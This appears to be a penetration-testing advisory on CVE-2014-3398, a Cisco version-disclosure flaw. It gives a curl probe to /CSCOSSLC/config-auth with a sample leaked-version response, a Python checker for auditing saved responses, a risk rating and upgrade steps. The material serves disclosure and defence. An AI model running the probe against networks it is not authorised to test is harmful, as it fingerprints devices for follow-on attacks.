Network Penetration Testing

Cisco Information Disclosure (CVE-2014-3398 – CSCuq65542)

Vulnerability Details

CVE-2014-3398 (Cisco bug ID CSCuq65542) is an information disclosure vulnerability that reveals the version of IOS. By identifying specific IOS versions, an attacker can determine exactly which vulnerabilities may affect a particular system. Malicious actors may also use it to catalogue the system for future attacks when new vulnerabilities are discovered.

Exploiting CVE-2014-3398

Exploitation can be carried out with a browser or a curl command. An HTTP GET request can be made to the following URL:

https://{IP}/CSCOSSLC/config-auth

Or using curl:

$ curl https://{IP}/CSCOSSLC/config-auth --insecure
<?xml version="1.0" encoding="UTF-8"?>
<config-auth client="vpn" type="complete">
<version who="sg">8.6(1)2</version>
<error id="96" param1="" param2="">VPN Server internal error.</error>
</config-auth>
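
To confirm whether your own devices still return a version string, the response body shown above can be parsed and checked automatically. The following is an added example, not part of the original page; the function names, the size cap and the shape of the "clean" response are assumptions made for illustration.

```python
import xml.etree.ElementTree as ET
from typing import Optional

# Constructed sample: the response body shown on this page.
SAMPLE_DISCLOSING = b"""<?xml version="1.0" encoding="UTF-8"?>
<config-auth client="vpn" type="complete">
<version who="sg">8.6(1)2</version>
<error id="96" param1="" param2="">VPN Server internal error.</error>
</config-auth>"""

# Constructed sample: assumed shape of a response that carries no version.
SAMPLE_CLEAN = b"""<?xml version="1.0" encoding="UTF-8"?>
<config-auth client="vpn" type="complete">
<error id="96" param1="" param2="">VPN Server internal error.</error>
</config-auth>"""

MAX_BODY = 64 * 1024  # hypothetical cap; responses of this kind are small


def disclosed_version(body: bytes) -> Optional[str]:
    """Return the version string a config-auth response leaks, or None."""
    # Refuse oversized bodies and DTDs before handing input to the parser.
    if len(body) > MAX_BODY or b"<!DOCTYPE" in body.upper():
        return None
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None  # empty body, truncated XML, non-XML error page
    if root.tag != "config-auth":
        return None  # well-formed, but not the document this check is about
    node = root.find("version")
    text = (node.text or "").strip() if node is not None else ""
    return text or None


def audit(responses: dict) -> dict:
    """Map each host label to its leaked version, keeping only leaking hosts."""
    found = {}
    for host, body in responses.items():
        version = disclosed_version(body)
        if version:
            found[host] = version
    return found
```

Feed `audit` the saved response bodies from your inventory; an empty result means none of them returned a `<version>` element.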

Risk Assessment

CVE-2014-3398 is rated as Medium Risk for external networks and Low Risk for internal networks. Although the information disclosed is minimal, the specific Cisco versions should never be revealed during normal operation. It may also provide valuable details for performing future attacks.

Remediation

Cisco has provided a detailed upgrade guide for IOS devices. Most upgrades follow these steps:

  • Configure a TFTP server.
  • Download the IOS images.
  • Connect to the router via serial.
  • Install and configure IOS.

The complete guide can be found here:
https://www.cisco.com/c/en/us/support/docs/routers/3800-series-integrated-services-routers/49044-sw-upgrade-proc-ram.html
